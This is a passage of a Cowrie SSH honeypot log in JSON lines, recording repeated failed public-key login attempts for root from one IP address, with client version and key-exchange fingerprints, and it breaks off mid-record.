{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.686007Z","src_ip":"212.227.235.229","session":"70bd23bfea30"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.686773Z","src_ip":"212.227.235.229","session":"70bd23bfea30"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.839235Z","src_ip":"212.227.235.229","session":"70bd23bfea30"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:12.839864Z","src_ip":"212.227.235.229","session":"70bd23bfea30"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.008950Z","src_ip":"212.227.235.229","session":"70bd23bfea30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53360,"dst_ip":"1.2.3.4","dst_port":22,"session":"e32c268b1106","protocol":"ssh","message":"New connection: 212.227.235.229:53360 (1.2.3.4:22) [session: e32c268b1106]","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.161534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.162286Z","src_ip":"212.227.235.229","session":"e32c268b1106"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.306844Z","src_ip":"212.227.235.229","session":"e32c268b1106"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.597821Z","src_ip":"212.227.235.229","session":"e32c268b1106"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.598475Z","src_ip":"212.227.235.229","session":"e32c268b1106"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.746161Z","src_ip":"212.227.235.229","session":"e32c268b1106"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.746855Z","src_ip":"212.227.235.229","session":"e32c268b1106"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:13.892801Z","src_ip":"212.227.235.229","session":"e32c268b1106"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53374,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac6aeb199c25","protocol":"ssh","message":"New connection: 212.227.235.229:53374 (1.2.3.4:22) [session: ac6aeb199c25]","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.044340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.045192Z","src_ip":"212.227.235.229","session":"ac6aeb199c25"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.197509Z","src_ip":"212.227.235.229","session":"ac6aeb199c25"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.503788Z","src_ip":"212.227.235.229","session":"ac6aeb199c25"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.504422Z","src_ip":"212.227.235.229","session":"ac6aeb199c25"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.657317Z","src_ip":"212.227.235.229","session":"ac6aeb199c25"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.658031Z","src_ip":"212.227.235.229","session":"ac6aeb199c25"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.813848Z","src_ip":"212.227.235.229","session":"ac6aeb199c25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53386,"dst_ip":"1.2.3.4","dst_port":22,"session":"625a9b2d1f66","protocol":"ssh","message":"New connection: 212.227.235.229:53386 (1.2.3.4:22) [session: 625a9b2d1f66]","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.965741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T16:36:14.966398Z","src_ip":"212.227.235.229","session":"625a9b2d1f66"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.118795Z","src_ip":"212.227.235.229","session":"625a9b2d1f66"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T16:36:15.425431Z","src_ip":"212.227.235.229","session":"625a9b2d1f66"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa 